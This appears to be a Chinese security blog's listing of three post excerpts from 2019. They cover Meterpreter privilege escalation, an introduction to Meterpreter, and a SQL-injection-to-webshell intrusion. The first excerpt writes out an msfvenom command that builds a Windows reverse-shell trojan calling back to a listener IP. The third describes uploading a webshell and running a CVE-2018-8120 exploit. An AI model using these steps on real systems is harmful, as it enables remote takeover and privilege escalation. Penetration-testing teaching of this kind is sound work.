2019年11月16日
0x01 Meterpreter自动提权1.生成后门程序我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为:windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为4444,
2019年11月16日
0x01初识Meterpreter1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远
2019年11月16日
前言在一次测试中发现某系统存在SQL注入漏洞。且IIS可暴露绝对路径。使用--os-shell命令,填写绝对路径可执行系统命令。提权sqlmap在执行--os-shellI命令时向服务器写入了上传文件的脚本。通过文件上传可直接上传大马。简单执行几条系统命令查看该服务器基本情况。权限不够,上传cve-2018-8120.exe进行提权。cve-2018-8120.exe "whoami"cve-2018-8120.exe "